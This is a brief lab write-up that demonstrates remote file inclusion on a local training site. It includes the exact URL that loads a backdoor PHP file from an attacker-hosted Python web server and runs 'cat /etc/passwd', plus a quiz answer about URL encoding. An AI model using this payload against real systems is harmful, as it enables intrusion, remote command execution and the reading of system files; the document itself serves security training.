Web Shell with Remote File Inclusion (RFI)

Lab 22: Insecure Direct Object Reference - Web Shell with Remote File Inclusion (RFI)

Go to lab page: https://127.0.0.1/index.php?page=labs/lab-22.php

The idea is to upload via RFI a web shell to execute directly on the website vulnerable. In this case, i decided to utilize 'simple-backdoor.php'.

On the attacker machine (10.0.2.15) we can run a python web server using:

python3 -m http.server 1339

and reach it concatenating to IP:PORT file_name and & cmd=command as below:

https://127.0.0.1/index.php?page=http://10.0.2.15:1339/simple-backdoor.php&cmd=cat+/etc/passwd

The correct answer is the last of the list: The plus symbol is the encoded character representing a space ' '. We have to encode the space character to prevent Apache web server from thinking the space marks the end of the URL.